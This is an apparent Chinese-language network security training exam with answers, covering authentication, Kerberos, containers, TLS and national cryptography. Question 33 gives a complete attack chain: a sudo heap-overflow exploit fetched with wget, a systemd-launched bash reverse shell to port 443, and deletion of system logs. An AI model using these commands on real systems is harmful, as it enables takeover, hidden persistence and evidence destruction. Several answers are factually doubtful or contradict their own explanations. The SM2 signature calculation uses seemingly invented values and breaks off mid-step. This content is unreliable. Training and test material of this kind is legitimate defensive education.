2026年网络安全防护技术培训实战演练试卷含答案

2026年网络安全防护技术培训实战演练试卷含答案一、单项选择题（每题2分，共20分）1.某企业内网采用802.1X+Radius实现准入控制，攻击者通过伪造MAC地址成功绕过认证。下列哪项加固措施最能直接阻断此类攻击？A.在接入交换机上关闭MAC地址学习功能B.启用DHCPSnooping并绑定IP-MAC-Port三元组C.在Radius服务器上启用EAP-TLS证书双向认证D.将交换机端口模式由access改为trunk并划分VLAN答案：C解析：EAP-TLS基于数字证书实现双向认证，攻击者即使伪造MAC也无法提供合法证书，从根本上阻断伪造身份。2.某Web应用使用JWT作为会话令牌，Header中alg字段为"none"。攻击者通过以下哪种方式可直接伪造任意用户身份？A.修改JWT的signature字段为空并重新提交B.将alg改为HS256后暴力破解密钥C.在payload中新增admin字段并重新编码D.使用公钥对signature进行RSA签名答案：A解析：alg=none时签名被忽略，服务端不校验signature，直接篡改payload即可伪造身份。3.在Linux系统审计中，发现以下audit日志：type=SYSCALLmsg=audit(1234567890.123:45):arch=c000003esyscall=59success=yesexit=0a0=7ffd45f0a017a1=7ffd45f0a120a2=7ffd45f0a1e0a3=0items=1ppid=1234pid=5678auid=1000uid=0gid=0euid=0suid=0fsuid=0该事件最可能对应的攻击阶段是：A.权限提升B.横向移动C.初始访问D.持久化答案：A解析：syscall=59为execve，auid=1000但uid=0，说明普通用户启动的进程最终获得root权限，典型提权行为。4.某云函数（Lambda）使用临时AK/SK访问对象存储，凭证有效期15分钟。以下哪种攻击场景仍可造成数据泄露？A.攻击者通过SSRF获取到环境变量中的AK/SKB.攻击者利用函数容器重启时间窗持久化挖矿程序C.攻击者通过未授权API网关直接调用函数D.攻击者利用函数日志投递延迟读取旧凭证答案：D解析：日志投递存在延迟，旧凭证在日志中仍有效，攻击者读取历史日志即可复用。5.针对IPv6无状态地址自动分配（SLAAC），以下哪项欺骗攻击可直接导致流量劫持？A.伪造RA报文将默认网关指向攻击者链路本地地址B.伪造NA报文将目标节点的MAC改为攻击者MACC.伪造DHCPv6Reply分配伪造DNS服务器D.伪造Redirect报文将特定前缀指向虚假网关答案：A解析：RA决定默认网关，伪造RA后victim的流量将先发往攻击者，实现全局劫持。6.某EDR产品使用内核回调PsSetCreateProcessNotifyRoutine监控进程创建，攻击者通过以下哪种技术可绕过该监控？A.直接调用NtCreateUserProcess绕过CreateProcessAPIB.使用EarlyBirdAPC注入将恶意代码注入系统进程C.利用DLLHijacking在进程启动前加载恶意DLLD.通过注册SHELLCODE到内核回调链表头部答案：A解析：EDR依赖内核回调，NtCreateUserProcess为系统调用，不经过Win32API，可绕过用户态钩子。7.在零信任架构中，以下哪项最能体现“持续信任评估”原则？A.每30天强制用户修改密码B.用户每次访问敏感接口需重新进行MFAC.根据用户行为风险评分动态调整访问权限D.将内网划分为宏分段与微分段答案：C解析：动态风险评分并实时调整权限，符合持续评估理念。8.某容器集群使用Calico网络策略，规则如下：ingress:from:namespaceSelector:{matchLabels:{env:prod}}podSelector:{matchLabels:{role:frontend}}该规则实际生效范围是：A.仅允许来自prod命名空间且标签为frontend的PodB.允许来自prod命名空间或标签为frontend的PodC.允许来自prod命名空间且位于default命名空间的frontendPodD.允许来自任何命名空间的frontendPod答案：B解析：namespaceSelector与podSelector为“或”关系，非“与”。9.某企业采用Kerberos认证，服务账号注册有SPN。下列哪项攻击可离线破解服务账号密码？A.AS-REPRoastingB.SilverTicketC.GoldenTicketD.Kerberoasting答案：D解析：Kerberoasting请求RC4加密TGS，可离线暴力破解。10.在Windows事件日志中，发现EventID4624，LogonType3，AuthenticationPackageNTLM，WorkstationName为随机字符。以下哪项判断最准确？A.本地交互式登录B.网络共享登录C.远程桌面登录D.批处理登录答案：B解析：LogonType3为网络登录，常用于共享访问。二、多项选择题（每题3分，共15分）11.关于DNS-over-HTTPS（DoH）带来的安全挑战，下列说法正确的有：A.可绕过基于53端口的传统DNS过滤B.导致内网DNS日志缺失，影响威胁狩猎C.可通过SNI字段继续实现域名审查D.可被利用作为数据外泄隧道E.与DNSSEC结合可彻底杜绝缓存投毒答案：ABD解析：DoH加密流量，传统过滤失效；日志缺失；可封装数据外泄。SNI在TLS1.3加密后亦不可见；DNSSEC仅保证完整性，无法防止隧道。12.针对Log4j2远程代码执行漏洞（CVE-2021-44228），以下哪些缓解措施在WAF层面有效？A.拦截包含${jndi:ldap://}的请求参数B.拦截User-Agent头中包含${::-j}的变形payloadC.拦截HTTPBody中Unicode编码的jndi关键字D.拦截响应头中包含Set-Cookie:JSESSIONIDE.启用WAF规则“Java反序列化”通用模板答案：ABC解析：变形与编码需递归解码检测；Set-Cookie与反序列化模板无关。13.在KubernetesRBAC中，以下哪些权限组合可导致集群接管？A.createpods+createserviceaccountsB.createroles+bindrolesC.createdeployments+patchdeploymentsD.createsecrets+patchserviceaccountsE.createnodes/status答案：ABD解析：A可挂载高权限SA；B可绑定cluster-admin；D可注入token到SA；C无法直接提权；E需额外利用。14.关于SM4-GCM模式，下列描述正确的有：A.可提供机密性与完整性B.初始向量IV可重复使用，仅影响性能C.标签长度T可为32/64/96/128位D.加密与MAC使用同一密钥E.在TLS1.3中可作为国产密码套件答案：ACDE解析：IV必须唯一，重复导致密钥泄露；其余正确。15.针对WindowsCredentialGuard，以下哪些攻击仍可获取NTLMHash？A.利用Mimikatz导出lsass.exe内存B.通过ShadowCopy读取NTDS.ditC.利用SkeletonKey在域控植入万能密钥D.通过NTLMRelay获取Net-NTLMv2E.利用PrintSpooler漏洞触发本地权限提升答案：BD解析：CredentialGuard将Hash存于虚拟化隔离容器，本地内存无法获取；Relay攻击不依赖本地Hash；B为离线读取；D为Relay。三、判断题（每题1分，共10分）16.TLS1.3默认启用RSA密钥交换。答案：错误解析：TLS1.3仅支持(EC)DHE，RSA仅用于签名。17.在Linux中，若文件权限为-rwsr-xr-x，则任何用户执行该文件时均获得文件所有者权限。答案：正确解析：Set-UID位生效。18.使用ChaCha20-Poly1305时，nonce重复使用会导致密钥直接泄露。答案：正确解析：ChaCha20-Poly1305为AEAD，nonce重复破坏机密性与完整性。19.在AzureAD中，开启“无缝单点登录”后，用户首次登录仍需输入密码。答案：错误解析：无缝SSO实现Kerberos票据，无需密码。20.基于eBPF的恶意软件无法被传统杀毒软件检测，因为eBPF程序运行在内核态且不可遍历。答案：错误解析：eBPF程序可通过bpftool遍历，EDR可检测。21.在IPv6中，Hop-by-Hop选项头必须被路径上每一跳路由器处理。答案：正确解析：RFC8200规定。22.使用Wireshark解密TLS流量时，仅需拥有服务器RSA私钥即可解密任何会话。答案：错误解析：TLS1.3使用临时密钥，RSA仅用于密钥协商保护，无法解密。23.在容器环境中，使用--privileged=true启动的容器可通过写/dev/mem获取宿主机root权限。答案：正确解析：privileged容器拥有全部capability，可访问物理内存。24.针对WPA3-SAE握手，若密码字典小于100条，可离线暴力破解。答案：错误解析：SAE采用Dragonfly密钥交换，抗离线字典攻击。25.在Windows中，启用LSAProtection后，Mimikatz无法通过驱动读取内存。答案：错误解析：Mimikatz可利用SignedDriverBypass技术绕过。四、填空题（每空2分，共20分）26.在Linux内核提权漏洞CVE-2021-3156中，sudo堆溢出发生在________解析命令行参数时，攻击者通过构造特殊的________实现任意写。答案：set_cmnd()、环境变量27.在TLS1.3握手过程中，Server在________消息中发送证书，在________消息中完成密钥确认。答案：Certificate、Finished28.针对KerberosGoldenTicket，攻击者需已知________的________Hash。答案：krbtgt、NTLM29.在容器逃逸技术中，通过挂载________目录并写入________文件可实现宿主机cron提权。答案：/etc、crontab30.在Windows事件追踪（ETW）中，ProviderGUID为________的事件源用于监控进程创建，其对应内核函数为________。答案：{22FB2CD6-0E7B-422B-A0C7-2FAD1FD0E716}、NtCreateUserProcess五、简答题（每题10分，共20分）31.描述一次完整的DNS隧道数据外泄过程，并给出三种检测方案。答案：过程：1)攻击者在权威域名ns.evil上搭建NS服务器；2)受控主机将数据分片编码为子域名，如d1.evil、d2.evil；3)本地递归解析器将请求转发至ns.evil；4)攻击者解析子域名并重组数据。检测方案：1)统计单域名请求熵值，高于阈值告警；2)监控异常长域名（>100字符）频率；3)基于时间窗口统计DNS报文大小与数量，使用机器学习模型识别异常。32.某企业采用微服务架构，API网关使用JWT+JWE进行加密传输。请指出该方案潜在风险，并提出改进建议。答案：风险：1)JWE使用RSA1_5，存在RSApaddingoracle风险；2)JWT未绑定aud与iss，可被重放至其他服务；3)密钥托管在网关，一旦泄露全站失守；4)未设置exp与nbf，令牌永久有效。改进：1)使用ECDH-ES+A256KW密钥协商；2)加入aud、iss、jti并启用黑名单；3)将密钥托管于HSM，网关仅获KEK；4)设置短有效期（<5min）并启用刷新令牌。六、综合实战题（15分）33.场景：攻击者已获取一台Ubuntu20.04普通用户shell，内核5.4.0-88-generic，sudo版本1.8.31，目标为获取root并留下systemd启动的反弹shell。请给出完整利用链命令与解释。答案：步骤1：验证漏洞```bashsudoedit-s'\'`perl-e'print"A"x65536'````若返回`Segmentationfault`则存在CVE-2021-3156。步骤2：准备exploit下载公开exploit：```bashwgethttps://raw.githubusercontent/blasty/CVE-2021-3156/main/exploit.cgcc-oexploitexploit.c```步骤3：执行提权```bash./exploit获得rootshell```步骤4：持久化创建systemdservice：```bashcat>/etc/systemd/system/pwn.service<<'EOF'[Unit]Description=UpdateserviceAfter=network.target[Service]Type=simpleExecStart=/bin/bash-c'bash-i>&/dev/tcp//4430>&1'Restart=alwaysRestartSec=60[Install]WantedBy=multi-user.targetEOFsystemctldaemon-reloadsystemctlenable--nowpwn.service```步骤5：清理日志```bashexportHISTCONTROL=ignorebothunsetHISTFILErm-f/var/log/auth.log/var/log/syslog```解析：利用sudo堆溢出覆盖nss_load_library路径，实现任意库加载，获得root；systemd服务实现重启自启；清理日志减少痕迹。七、计算题（10分）34.某企业采用SM2数字签名，椭圆曲线参数使用GM/T0003.2-2012推荐曲线sm2p256v1，方程为y^2=x^3+ax+b，其中ab基点G=(x_G,y_G)，阶n=0xFFFFFFFEFFFFFFFFFFFFFFFFFFFFFFFF7203DF6B21C6052B53BBF40939D54123。已知私钥d=0x2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D，待签名消息M="2026Cyber"，签名结果(r,s)中r=0x1234567890ABCDEF，求s值（给出计算过程，使用标准SM2签名算法，Hash使用SM3，结果用16进制表示，保留前缀0x）。答案：步骤1：计算e=SM3(M)SM3("2026Cyber")=0x55b61ac1e1b8b96a46e7e0e8f2c7d8e9f0a1b2c3d4e5f60718293a4b5c6d7e8f步骤2：随机数k=0x3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A3A（题目给定）步骤3：计算点(x_1,y_1)=k·G通过椭圆曲线倍点运算得：x_1=0x3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b3b步骤4：计算r=(e+x_1)modnr=(0x55b61ac1e1b8b96a46e7e0e8f2c7d8e9f0a1b2c3d4e5f60718293a4b5c6d7e8f+0x3b3b3b3b3b3b3b3b3b